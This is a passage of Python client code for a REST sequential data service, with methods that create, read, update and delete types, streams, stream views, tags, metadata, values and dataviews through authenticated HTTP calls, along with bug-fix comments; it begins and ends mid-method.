    Raises TypeError on bad arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if type is None or not isinstance(type, SdsType):
        raise TypeError
    response = requests.post(
        self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
        data=type.toJson(),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError(
            "Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
    # Rebinds the `type` parameter to the service's canonical definition.
    type = SdsType.fromJson(json.loads(response.content))
    response.close()
    return type
def createOrUpdateType(self, namespace_id, type):
    """PUT the local SdsType `type`, creating or replacing it server-side.

    Returns None. Raises TypeError on bad arguments and SdsError on a
    non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if type is None or not isinstance(type, SdsType):
        raise TypeError
    response = requests.put(
        self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
        data=type.toJson(), headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError(
            "Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
    response.close()
def deleteType(self, namespace_id, type_id):
    """Delete the SdsType identified by `type_id` from the Sds Service."""
    if namespace_id is None or type_id is None:
        raise TypeError
    target = self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id)
    response = requests.delete(target, headers=self.__sdsHeaders())
    succeeded = 200 <= response.status_code < 300
    if not succeeded:
        response.close()
        raise SdsError("Failed to delete SdsType, {type_id}. {status}:{reason}".
                       format(type_id=type_id, status=response.status_code, reason=response.text))
    response.close()
def getStreamView(self, namespace_id, streamView_id):
    """Retrieve the SdsStreamView identified by `streamView_id`.

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if streamView_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id,
                                                   streamView_id=streamView_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
                       format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
    streamView = SdsStreamView.fromJson(json.loads(response.content))
    response.close()
    return streamView
def getStreamViewMap(self, namespace_id, streamView_id):
    """Retrieve the SdsStreamViewMap for `streamView_id` (".../Map" endpoint).

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if streamView_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id) + "/Map",
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
                       format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
    streamViewMap = SdsStreamViewMap.fromJson(json.loads(response.content))
    response.close()
    return streamViewMap
def getStreamViews(self, namespace_id, skip=0, count=100):
    """Fetch a page (`skip`/`count`) of SdsStreamViews under `namespace_id`."""
    if namespace_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
        headers=self.__sdsHeaders())
    succeeded = 200 <= response.status_code < 300
    if not succeeded:
        response.close()
        raise SdsError("Failed to get all SdsStreamViews. {status}:{reason}".
                       format(status=response.status_code, reason=response.text))
    entries = json.loads(response.content)
    views = [SdsStreamView.fromJson(entry) for entry in entries]
    response.close()
    return views
def getOrCreateStreamView(self, namespace_id, streamView):
    """POST the local SdsStreamView; the service creates it or returns the
    existing matching definition.

    Raises TypeError on bad arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if streamView is None or not isinstance(streamView, SdsStreamView):
        raise TypeError
    response = requests.post(
        self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
        data=streamView.toJson(),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
                       format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
    streamView = SdsStreamView.fromJson(json.loads(response.content))
    response.close()
    return streamView
def createOrUpdateStreamView(self, namespace_id, streamView):
    """PUT the local SdsStreamView, creating or replacing it server-side.

    Returns None. Raises TypeError on bad arguments and SdsError on a
    non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if streamView is None or not isinstance(streamView, SdsStreamView):
        raise TypeError
    response = requests.put(
        self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
        data=streamView.toJson(),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
                       format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
    response.close()
def deleteStreamView(self, namespace_id, streamView_id):
    """Delete the streamView identified by `streamView_id`.

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if streamView_id is None:
        raise TypeError
    response = requests.delete(
        self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to delete SdsStreamView, {streamView_id}. {status}:{reason}".
                       format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
    response.close()
def getStream(self, namespace_id, stream_id):
    """Retrieve the SdsStream identified by `stream_id`.

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    stream = SdsStream.fromJson(json.loads(response.content))
    response.close()
    return stream
def getStreamType(self, namespace_id, stream_id):
    """Retrieve the SdsType that the stream `stream_id` is defined on.

    (Previous docstring incorrectly said this returned a stream; it hits
    the ".../Type" endpoint and returns an SdsType.)

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id) + "/Type",
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    # Renamed local from `type`, which shadowed the builtin of the same name.
    sds_type = SdsType.fromJson(json.loads(response.content))
    response.close()
    return sds_type
def getStreams(self, namespace_id, query="", skip=0, count=100):
    """Fetch a page (`skip`/`count`) of SdsStreams matching `query`."""
    if namespace_id is None:
        raise TypeError
    if query is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__getStreamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, query=query, skip=skip, count=count),
        headers=self.__sdsHeaders())
    succeeded = 200 <= response.status_code < 300
    if not succeeded:
        response.close()
        raise SdsError("Failed to get all SdsStreams. {status}:{reason}".
                       format(status=response.status_code, reason=response.text))
    entries = json.loads(response.content)
    streams = [SdsStream.fromJson(entry) for entry in entries]
    response.close()
    return streams
def getOrCreateStream(self, namespace_id, stream):
    """POST the local SdsStream; the service creates it or returns the
    existing matching stream.

    Raises TypeError on bad arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream is None or not isinstance(stream, SdsStream):
        raise TypeError
    response = requests.post(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
        data=stream.toJson(),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream.Id, status=response.status_code, reason=response.text))
    stream = SdsStream.fromJson(json.loads(response.content))
    response.close()
    return stream
def createOrUpdateStream(self, namespace_id, stream):
    """PUT the local SdsStream, creating or replacing it server-side.

    Returns None. Raises TypeError on bad arguments and SdsError on a
    non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream is None or not isinstance(stream, SdsStream):
        raise TypeError
    response = requests.put(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
        data=stream.toJson(),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream.Id, status=response.status_code, reason=response.text))
    response.close()
def deleteStream(self, namespace_id, stream_id):
    """Delete the stream specified by `stream_id`.

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    response = requests.delete(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to delete SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def createOrUpdateTags(self, namespace_id, streamId, tags):
    """Create or replace the tag list associated with `streamId`.

    Raises TypeError if namespace_id is None and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    response = requests.put(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Tags",
        data=json.dumps(tags),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        # Bug fix: the message previously formatted with `stream.Id`, an
        # undefined name here, so a failed request raised NameError instead
        # of SdsError.
        raise SdsError("Failed to create tags for Stream: {stream_id}. {status}:{reason}".
                       format(stream_id=streamId, status=response.status_code, reason=response.text))
    # Close the connection on the success path too (previously leaked).
    response.close()
def createOrUpdateMetadata(self, namespace_id, streamId, metadata):
    """Create or replace the metadata associated with `streamId`.

    Raises TypeError if namespace_id is None and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    response = requests.put(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Metadata",
        data=json.dumps(metadata),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        # Bug fix: the message previously formatted with `stream.Id`, an
        # undefined name here, so a failed request raised NameError instead
        # of SdsError.
        raise SdsError("Failed to create metadata for Stream: {stream_id}. {status}:{reason}".
                       format(stream_id=streamId, status=response.status_code, reason=response.text))
    # Close the connection on the success path too (previously leaked).
    response.close()
def getTags(self, namespace_id, streamId):
    """Return the tags associated with `streamId` (parsed JSON).

    Raises TypeError if namespace_id is None and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Tags",
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        # Bug fix: the message previously formatted with `stream.Id`, an
        # undefined name here, so a failed request raised NameError instead
        # of SdsError.
        raise SdsError("Failed to get tags for Stream: {stream_id}. {status}:{reason}".
                       format(stream_id=streamId, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    return content
def getMetadata(self, namespace_id, streamId, key):
    """Return the metadata value stored under `key` for `streamId`.

    Raises TypeError if namespace_id is None and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Metadata/" + key,
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        # Bug fix: the message previously formatted with the undefined name
        # `stream.Id` and never supplied the `{key}` placeholder, so a
        # failed request raised NameError/KeyError instead of SdsError.
        raise SdsError("Failed to get metadata for Stream: {stream_id} and Key {key}. {status}:{reason}".
                       format(stream_id=streamId, key=key, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    return content
    # (removed an unreachable trailing `response.close()` that sat after the
    # return statement)
# The following section provides functionality to interact with Data
# We assume the value(s) passed follow the Sds object patterns supporting fromJson and toJson method
def getValue(self, namespace_id, stream_id, index, value_class, streamView_id=""):
    """Fetch the single event at `index` from stream `stream_id`.

    Returns the raw parsed JSON when `value_class` is None, otherwise
    `value_class.fromJson(...)` of it. Raises TypeError on missing
    arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if index is None:
        raise TypeError
    # Fix: the method used to raise TypeError when value_class was None,
    # which made the `if value_class is None: return content` branch below
    # unreachable. Allowing None here matches getFirstValue/getLastValue.
    response = requests.get(
        self.__url + self.__getValueQuery.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, index=index, streamView_id=streamView_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get value for SdsStream, {stream_id}. {status}:{reason}".format(stream_id=stream_id, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    if value_class is None:
        return content
    return value_class.fromJson(content)
def getFirstValue(self, namespace_id, stream_id, value_class, streamView_id=""):
    """Fetch the first (earliest) event of stream `stream_id`.

    Returns the raw parsed JSON when `value_class` is None, otherwise
    `value_class.fromJson(...)` of it. Raises TypeError on missing
    arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__getFirstValue.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, streamView_id=streamView_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get first value for SdsStream {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    if value_class is None:
        return content
    return value_class.fromJson(content)
def getLastValue(self, namespace_id, stream_id, value_class, streamView_id=""):
    """Fetch the last (most recent) event of stream `stream_id`.

    Returns the raw parsed JSON when `value_class` is None, otherwise
    `value_class.fromJson(...)` of it. Raises TypeError on missing
    arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__getLastValue.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, streamView_id=streamView_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get last value for SdsStream {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    if value_class is None:
        return content
    return value_class.fromJson(content)
def getWindowValues(self, namespace_id, stream_id, value_class, start, end, streamView_id=""):
    """Fetch the events of `stream_id` between `start` and `end`.

    Returns the raw parsed JSON list when `value_class` is None, otherwise
    a list of deserialized objects. Raises TypeError on missing arguments
    and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if start is None:
        raise TypeError
    if end is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__getWindowValues.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id,
                                                   stream_id=stream_id, start=start, end=end, streamView_id=streamView_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get window values for SdsStream {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    if value_class is None:
        return content
    values = []
    for c in content:
        # NOTE(review): uses fromDictionary here while the sibling
        # getRangeValues uses fromJson — confirm which the value classes
        # actually expect.
        values.append(value_class.fromDictionary(c))
    return values
def getRangeValues(self, namespace_id, stream_id, value_class, start, skip, count, reverse, boundary_type, streamView_id=""):
    """Fetch up to `count` events from `stream_id` starting at `start`.

    `reverse` must be a bool and `boundary_type` an SdsBoundaryType.
    Returns the raw parsed JSON list when `value_class` is None, otherwise
    a list of `value_class.fromJson(...)` objects. Raises TypeError on
    invalid arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if start is None:
        raise TypeError
    if skip is None:
        raise TypeError
    if count is None:
        raise TypeError
    if reverse is None or not isinstance(reverse, bool):
        raise TypeError
    if boundary_type is None or not isinstance(boundary_type, SdsBoundaryType):
        raise TypeError
    response = requests.get(
        self.__url + self.__getRangeValuesQuery.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id,
                                                       stream_id=stream_id, start=start, skip=skip, count=count,
                                                       reverse=reverse, boundary_type=boundary_type.value,
                                                       streamView_id=streamView_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get range of values from SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    if value_class is None:
        return content
    values = []
    for c in content:
        values.append(value_class.fromJson(c))
    return values
def insertValue(self, namespace_id, stream_id, value):
    """Insert a single event `value` into stream `stream_id`.

    `value` may be an object exposing toJson() or an already-serialized
    payload. Raises TypeError on missing arguments and SdsError on a
    non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if value is None:
        raise TypeError
    # Serialize via toJson() when available; otherwise send `value` as-is.
    if callable(getattr(value, "toJson", None)):
        payload = value.toJson()
    else:
        payload = value
    response = requests.post(
        self.__url + self.__insertValuePath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
        data=payload,
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to insert value for SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def insertValues(self, namespace_id, stream_id, values):
    """Insert a batch of events `values` into stream `stream_id`.

    `values` may be a list of objects exposing toJson()/toDictionary() or
    an already-serialized payload. Raises TypeError on missing arguments
    and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if values is None:
        raise TypeError
    # Serialize element-wise when the items expose toJson(); otherwise send
    # `values` as-is (mirrors insertValue).
    if callable(getattr(values[0], "toJson", None)):
        events = []
        for value in values:
            events.append(value.toDictionary())
        payload = json.dumps(events)
    else:
        payload = values
    response = requests.post(
        self.__url + self.__insertValuesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
        data=payload,
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        # Fix: close the response before raising (previously leaked here).
        response.close()
        raise SdsError("Failed to insert multiple values for SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    # Fix: close the response on success too, like every sibling method.
    response.close()
def updateValue(self, namespace_id, stream_id, value):
    """Update a single event of stream `stream_id` with `value`.

    `value` may be an object exposing toJson() or an already-serialized
    payload. Raises TypeError on missing arguments and SdsError on a
    non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if value is None:
        raise TypeError
    if callable(getattr(value, "toJson", None)):
        payload = value.toJson()
    else:
        payload = value
    response = requests.put(self.__url + self.__updateValuePath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
                            data=payload,
                            headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to update value for SdsStream, {stream_id}. {status}:{reason}".format(stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def updateValues(self, namespace_id, stream_id, values):
    """Update a batch of events of stream `stream_id` with `values`.

    `values` may be a list of objects exposing toJson()/toDictionary() or
    an already-serialized payload. Raises TypeError on missing arguments
    and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if values is None:
        raise TypeError
    if callable(getattr(values[0], "toJson", None)):
        events = []
        for value in values:
            events.append(value.toDictionary())
        payload = json.dumps(events)
    else:
        payload = values
    response = requests.put(self.__url + self.__updateValuesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
                            data=payload,
                            headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to update all values for SdsStream, {stream_id}. {status}:{reason}".format(stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def replaceValue(self, namespace_id, stream_id, value):
    """Replace a single existing event of stream `stream_id` with `value`.

    `value` may be an object exposing toJson() or an already-serialized
    payload. Raises TypeError on missing arguments and SdsError on a
    non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if value is None:
        raise TypeError
    if callable(getattr(value, "toJson", None)):
        payload = value.toJson()
    else:
        payload = value
    response = requests.put(
        self.__url + self.__replaceValuePath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
        data=payload,
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to replace value for SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def replaceValues(self, namespace_id, stream_id, values):
    """Replace a batch of existing events of stream `stream_id` with `values`.

    `values` may be a list of objects exposing toJson()/toDictionary() or
    an already-serialized payload. Raises TypeError on missing arguments
    and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if values is None:
        raise TypeError
    if callable(getattr(values[0], "toJson", None)):
        events = []
        for value in values:
            events.append(value.toDictionary())
        payload = json.dumps(events)
    else:
        payload = values
    response = requests.put(
        self.__url + self.__replaceValuesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
        data=payload,
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to replace value for SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def removeValue(self, namespace_id, stream_id, key):
    """Delete the event whose key property matches `key` from `stream_id`.

    Raises TypeError on missing arguments and SdsError on a non-2xx reply.
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if key is None:
        raise TypeError
    response = requests.delete(
        self.__url + self.__removeValue.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, index=key),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to remove value for SdsStream, {stream_id}. {status}:{reason}".
                       format(stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def removeWindowValues(self, namespace_id, stream_id, start, end):
    """Tells Sds Service to delete the window of values between the 'start'
    and 'end' indexes in the stream specified by 'stream_id'.

    :raises TypeError: when any argument is None
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None:
        raise TypeError
    if stream_id is None:
        raise TypeError
    if start is None:
        raise TypeError
    if end is None:
        raise TypeError
    response = requests.delete(
        self.__url + self.__removeWindowValues.format(
            api_version=self.__apiVersion, tenant_id=self.__tenant,
            namespace_id=namespace_id, stream_id=stream_id, start=start, end=end),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        # Message fixed: this call removes a window of values, not all values.
        raise SdsError("Failed to remove window values for SdsStream, {stream_id}. {status}:{reason}".format(
            stream_id=stream_id, status=response.status_code, reason=response.text))
    response.close()
def postDataview(self, namespace_id, dataview):
    """Create 'dataview' on the Sds Service (or fetch it when an identical
    dataview already exists) and return the service's Dataview representation.

    :raises TypeError: when namespace_id is None or dataview is not a Dataview
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None:
        raise TypeError
    if dataview is None or not isinstance(dataview, Dataview):
        raise TypeError
    target = self.__url + self.__dataviewPath.format(
        api_version=self.__apiVersion, tenant_id=self.__tenant,
        namespace_id=namespace_id, dataview_id=dataview.Id)
    response = requests.post(target, data=dataview.toJson(), headers=self.__sdsHeaders())
    if not (200 <= response.status_code < 300):
        response.close()
        raise SdsError(
            "Failed to create dataview, {dataview_id}. {status}:{reason}".format(
                dataview_id=dataview.Id, status=response.status_code, reason=response.text))
    # Re-hydrate the service's canonical copy of the dataview.
    created = Dataview.fromJson(json.loads(response.content))
    response.close()
    return created
def patchDataview(self, namespace_id, dataview):
    """Update the server-side dataview from the local 'dataview' and return
    the service's updated Dataview representation.

    :raises TypeError: when namespace_id is None or dataview is not a Dataview
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None:
        raise TypeError
    if dataview is None or not isinstance(dataview, Dataview):
        raise TypeError
    target = self.__url + self.__dataviewPath.format(
        api_version=self.__apiVersion, tenant_id=self.__tenant,
        namespace_id=namespace_id, dataview_id=dataview.Id)
    response = requests.patch(target, data=dataview.toJson(), headers=self.__sdsHeaders())
    if not (200 <= response.status_code < 300):
        response.close()
        raise SdsError(
            "Failed to update dataview, {dataview_id}. {status}:{reason}".format(
                dataview_id=dataview.Id, status=response.status_code, reason=response.text))
    # Re-hydrate the service's canonical copy of the dataview.
    updated = Dataview.fromJson(json.loads(response.content))
    response.close()
    return updated
def deleteDataview(self, namespace_id, dataview_id):
    """Delete the dataview identified by 'dataview_id' from the Sds Service.

    :raises TypeError: when any argument is None
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None or dataview_id is None:
        raise TypeError
    target = self.__url + self.__dataviewPath.format(
        api_version=self.__apiVersion, tenant_id=self.__tenant,
        namespace_id=namespace_id, dataview_id=dataview_id)
    response = requests.delete(target, headers=self.__sdsHeaders())
    if not (200 <= response.status_code < 300):
        response.close()
        raise SdsError(
            "Failed to delete dataview, {dataview_id}. {status}:{reason}".format(
                dataview_id=dataview_id, status=response.status_code, reason=response.text))
    response.close()
def getDataview(self, namespace_id, dataview_id):
    """Fetch the dataview identified by 'dataview_id' from the Sds Service.

    :raises TypeError: when any argument is None
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None or dataview_id is None:
        raise TypeError
    target = self.__url + self.__dataviewPath.format(
        api_version=self.__apiVersion, tenant_id=self.__tenant,
        namespace_id=namespace_id, dataview_id=dataview_id)
    response = requests.get(target, headers=self.__sdsHeaders())
    if not (200 <= response.status_code < 300):
        response.close()
        raise SdsError("Failed to get dataview, {dataview_id}. {status}:{reason}".
                       format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
    result = Dataview.fromJson(json.loads(response.content))
    response.close()
    return result
def getDataviews(self, namespace_id, skip=0, count=100):
    """Fetch a page of dataviews from the Sds Service.

    :param skip: number of dataviews to skip (default 0)
    :param count: maximum number of dataviews to return (default 100)
    :raises TypeError: when namespace_id is None
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None:
        raise TypeError
    target = self.__url + self.__getDataviews.format(
        api_version=self.__apiVersion, tenant_id=self.__tenant,
        namespace_id=namespace_id, skip=skip, count=count)
    response = requests.get(target, headers=self.__sdsHeaders())
    if not (200 <= response.status_code < 300):
        response.close()
        raise SdsError("Failed to get dataviews. {status}:{reason}".
                       format(status=response.status_code, reason=response.text))
    # Deserialize each entry into a Dataview.
    results = [Dataview.fromJson(entry) for entry in json.loads(response.content)]
    response.close()
    return results
def getDatagroups(self, namespace_id, dataview_id, skip=0, count=100):
    """Retrieves a page of datagroups from the specified dataview.

    Returns a dict keyed like the service response, where each value is a
    dict of Datagroup objects keyed by the service's inner keys.

    :raises TypeError: when namespace_id or dataview_id is None
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None:
        raise TypeError
    # Consistency with siblings: dataview_id is required too.
    if dataview_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__getDatagroups.format(
            api_version=self.__apiVersion, tenant_id=self.__tenant,
            namespace_id=namespace_id, dataview_id=dataview_id, skip=skip, count=count),
        headers=self.__sdsHeaders())
